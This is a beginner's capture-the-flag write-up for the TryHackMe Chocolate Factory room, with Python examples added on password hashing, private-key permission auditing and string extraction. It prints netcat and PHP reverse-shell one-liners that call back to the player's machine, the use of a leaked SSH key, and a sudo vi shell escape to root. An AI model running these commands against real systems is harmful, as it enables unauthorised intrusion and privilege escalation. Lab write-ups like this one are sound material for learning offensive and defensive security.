Chocolate Factory @ TryHackMe write-up

Hello all! This is a write-up for the funny Chocolate Factory room at tryhackme.com. Since I’m a beginner myself, I chose a beginner-friendly room to start my write-up writing career.

Welcome and let’s get started!

And the first thing is… enumerate!

Let’s run nmap:

nmap -p- <target-machine-ip>

Wow!! So many open ports!!

Let’s check what they are running and pull up nmap again. This time I’ll save the output to a file.

nmap -p 21,22,80,100-125 -T4 -A -oA chocolate-nmap <target-machine-ip>

Opening the report on our text editor, we can see a lot of… ASCII?

And this goes on until the end… except for port 113:

Well, there is some key somewhere on the web server. Let us take note of this and check the website.

Open the browser and enter the machine IP address:

We are presented with a login page but we do not know the credentials. I guess brute-forcing this would be an option, but I usually save that as a last resort.

Let’s check the source code of the page.

A simple POST form that sends the data to a PHP file called validate.php.

Continuing with the discovery phase, let’s enumerate the web server directories and files using Gobuster:

gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<target-machine-IP> -t 50 -x php,txt,htm,html,cfg -s 200,301,304

Nice! Gobuster shows us 3 files. index.html and validate.php we already know, so let’s navigate to home.php.

I guess we can run commands from this page. Let’s try some.

id

www-data, as expected, I guess. Check the directory contents with ls.

ls -al

It’s kind of hard to read, so let’s arrange this:

Remember what nmap found on port 113, referring to some key_rev_key file? There it is! But, what kind of file is it?

file key_rev_key

It is a binary executable. We can, probably, get something out of it. Maybe later.

This interface is kinda rude, so let’s try to get a shell. First, check whether the system has netcat installed by running

whereis nc

Well, it has. Set up a listener on your box and launch a netcat reverse shell from the page.

nc -nvlp 65000

nc -n <your-machine-ip> 65000 -e /bin/bash

And nothing happens…

Since the web server runs PHP, it must have PHP installed…

whereis php

So grab one of the one liners from the fantastic Swissky’s repo on github, PayloadsAllTheThings, reverse shell cheat sheet.

Again, set up a listener on your box and launch the PHP one-liner reverse shell from the page.

nc -nvlp 65000

/usr/bin/php -r '$sock=fsockopen("<your-machine-ip>",65000);exec("/bin/sh -i <&3 >&3 2>&3");'

And we got shell!!

Let’s make it more usable:

python -c 'import pty;pty.spawn("/bin/bash")'

export TERM=screen

CTRL + Z

stty raw -echo

fg

Now we have a pretty little shell…

Check the files in this directory.

ls -al

We can read most of those files. We already know that key_rev_key is an executable file but we do not have permissions to run it.

Take a peek at validate.php.

cat validate.php

And we have “charlie” password for the web application!

If we enter those credentials on the login page, we are taken to… home.php. And it is just the same as if we had gone there directly.
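The lesson from validate.php is that a credential written into a source file is only as secret as the file itself: once the command page let us read the source as www-data, the password was ours. As an added example (mine, not code from the room or from this write-up), here is the same login check in Python in two forms: the weak pattern, where the password is a string literal that anyone who can read the source obtains directly, and a hardened form that stores only a salted PBKDF2 hash and compares it in constant time. The user name and password values are constructed placeholders, not the room’s real ones.

```python
import hashlib
import hmac
import os

# Constructed sample credential pair standing in for the one found in
# validate.php; the real values from the room are deliberately not reproduced.
SAMPLE_USER = "charlie"
SAMPLE_PASSWORD = "constructed-sample-password"

# --- Weak pattern: the password itself is a literal in the source -----------
# Anyone who can read the file (here, www-data through the command page)
# walks away with a working credential.
WEAK_STORE = {SAMPLE_USER: SAMPLE_PASSWORD}

def weak_validate(user: str, password: str) -> bool:
    """Plaintext comparison: reading the source is the same as knowing the password."""
    return WEAK_STORE.get(user) == password

# --- Hardened pattern: keep only a salted, slow hash -------------------------
ITERATIONS = 200_000  # PBKDF2 work factor; raise as hardware allows

def hash_password(password: str, salt: bytes = b"") -> str:
    """Return 'pbkdf2_sha256$<salt-hex>$<digest-hex>' with a random salt per password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%s$%s" % (salt.hex(), digest.hex())

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    try:
        algo, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))

HARDENED_STORE = {SAMPLE_USER: hash_password(SAMPLE_PASSWORD)}

# Hash checked when the user does not exist, so "no such user" takes as long
# as "wrong password" and user names cannot be enumerated by timing.
DUMMY_HASH = hash_password("not-a-real-password")

def hardened_validate(user: str, password: str) -> bool:
    stored = HARDENED_STORE.get(user)
    if stored is None:
        verify_password(password, DUMMY_HASH)
        return False
    return verify_password(password, stored)

def source_leak_yields_password(store: dict) -> bool:
    """Model of what a reader of the source gets: with the weak store the stored
    value is the password itself; with the hardened store it is only a hash."""
    return store.get(SAMPLE_USER) == SAMPLE_PASSWORD
```

With the hardened store, a leak of the file still costs you a credential rotation, but the attacker has to crack a salted 200,000-iteration hash instead of reading the password off the screen, and the constant-time compare removes the timing side channel that a naive string comparison leaks.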

OK, so let’s take a walk through the filesystem.

ls -al /home

We can try to change user to charlie using the same password… but it does not work.

We have permissions to check charlie’s home directory, so why not?

ls -al /home/charlie

Well, we cannot read the user flag, but we can check those teleport files.

cat teleport

cat teleport.pub

Nice!! Public and private RSA keys that will allow us to ssh into the machine as charlie!

Copy the contents of the private key file, teleport, to a file on your machine. We can simply copy/paste from the previous cat command.

Then, on your machine, run the ssh client with the identity flag pointing to the file you just created.

ssh charlie@<target-machine-ip> -i teleport

And we are charlie! Let’s jump to charlie’s home dir, /home/charlie, and grab that user flag!

cd /home/charlie && cat user.txt
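The whole foothold on charlie rested on one misconfiguration: a private key in his home directory was readable by the web server’s user. As an added example, not part of the original write-up, the following Python script audits a directory tree for files that look like private keys and reports any that group or others can read, which is the check a sysadmin would run to catch this before an attacker does. It builds its own throw-away fixture with constructed placeholder key files (not real key material); the file names teleport and id_ed25519 are assumptions for the demo.

```python
import os
import stat
import tempfile
from pathlib import Path
from typing import List, Tuple

# PEM/OpenSSH headers that identify a file as a private key.
PRIVATE_KEY_MARKERS = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
)

def looks_like_private_key(path: Path) -> bool:
    """Cheap content check: only the first line matters."""
    try:
        with path.open("rb") as fh:
            return fh.read(64).startswith(PRIVATE_KEY_MARKERS)
    except OSError:
        return False

def exposure_reason(mode: int) -> str:
    """Classify the mode bits; '' means only the owner can read the file."""
    if mode & stat.S_IROTH:
        return "world-readable"
    if mode & stat.S_IRGRP:
        return "group-readable"
    return ""

def audit_private_keys(root: Path) -> List[Tuple[str, str]]:
    """Walk root and return (path, reason) for every private key readable
    beyond its owner. Public keys (*.pub) never match the headers above."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if not path.is_file() or not looks_like_private_key(path):
                continue
            reason = exposure_reason(path.stat().st_mode)
            if reason:
                findings.append((str(path), reason))
    return sorted(findings)

def build_fixture() -> Path:
    """Constructed fake home directory: one loose key, one properly locked key
    and one public key. The key bodies are placeholders, not real key material."""
    root = Path(tempfile.mkdtemp(prefix="keyaudit-"))
    home = root / "charlie"
    home.mkdir()
    loose = home / "teleport"
    loose.write_bytes(b"-----BEGIN RSA PRIVATE KEY-----\nCONSTRUCTED-PLACEHOLDER\n-----END RSA PRIVATE KEY-----\n")
    loose.chmod(0o644)            # readable by everyone: the situation in the room
    tight = home / "id_ed25519"
    tight.write_bytes(b"-----BEGIN OPENSSH PRIVATE KEY-----\nCONSTRUCTED-PLACEHOLDER\n-----END OPENSSH PRIVATE KEY-----\n")
    tight.chmod(0o600)            # owner-only: what ssh-keygen produces by default
    pub = home / "teleport.pub"
    pub.write_text("ssh-rsa CONSTRUCTED-PLACEHOLDER charlie@example\n")
    pub.chmod(0o644)              # public keys are fine world-readable
    return root

if __name__ == "__main__":
    for path, reason in audit_private_keys(build_fixture()):
        print(f"{reason}: {path}")
```

Run against /home on a real box, the script is a quick way to confirm that every private key is 0600 (ssh itself refuses to use a key it considers too open, but that protects the legitimate owner, not the file from other local users). The header check is deliberately simple; encrypted keys still match, which is what you want, since even an encrypted key should not be readable by the web server.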

Now, we return to the web server public directory, located at /var/www/html and run key_rev_key.

Remember, this is a CTF. On a real pentesting job, DO NOT RUN UNKNOWN EXECUTABLES!

cd /var/www/html

chmod +x key_rev_key

./key_rev_key

The program asks for a name that we do not have, but it might be hardcoded in it. Let’s run strings on it.

strings key_rev_key

It gives us a bunch of strings. Let’s focus on those we are more familiar with.

Although “laksdhfas” is weird, let’s feed it to the program.

Well done! We got a key!
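Why does strings turn up the name? Anything the program prompts with, prints, or compares against is stored as a run of printable bytes, so a secret stored that way is as good as public to anyone who can read the file. As an added example (not code from the room or from this write-up), here is a small Python re-implementation of the strings heuristic, plus a filter that drops common linker and libc symbol names so the application’s own literals stand out. It runs on a constructed byte blob with a placeholder name; the real key_rev_key binary and its strings are not reproduced.

```python
import re
from typing import List

# Minimum run length, the same default GNU strings uses.
MIN_LEN = 4

def extract_strings(blob: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Return every run of at least min_len printable ASCII bytes, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]

def find_candidates(blob: bytes) -> List[str]:
    """Drop strings that are obviously section names, linker or libc noise so
    the application's own literals stand out (a heuristic, not exhaustive)."""
    noise = re.compile(r"^(\.|__|GLIBC|GCC|libc|/lib)")
    return [s for s in extract_strings(blob) if not noise.match(s)]

# Constructed stand-in for a small ELF-like file: a header, a few typical
# section and symbol names, and three application literals (a prompt, a
# hardcoded name and a success message). Not the real key_rev_key.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b".text\x00.rodata\x00GLIBC_2.2.5\x00__libc_start_main\x00"
    + b"Enter your name: \x00"
    + b"\x90" * 5
    + b"hardcoded-name-placeholder\x00"
    + b"Congratulations!\x00\x01\x02"
)

if __name__ == "__main__":
    for s in find_candidates(SAMPLE_BINARY):
        print(s)
```

The filtered list is exactly what a reverse engineer skims for: the prompt tells you what the program asks, and the odd-looking literal next to it is the obvious candidate answer. The defensive takeaway is the same one as for validate.php: a comparison against a literal in the binary is not a secret, and if a binary must gate something, it should compare against a hash, not the plaintext.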

Now, for the root!!

Run sudo to check what charlie can or cannot do without a password.

sudo -l

We can run the vim text editor as root. That should be fun! If you search GTFOBins for vi, you’ll find that it will be easy to become root. Just run:

sudo vi -c ':!/bin/bash' /dev/null

Just grab that root flag, and we are done!

Thanks for reading this write-up. Hope you enjoyed this Chocolate Factory!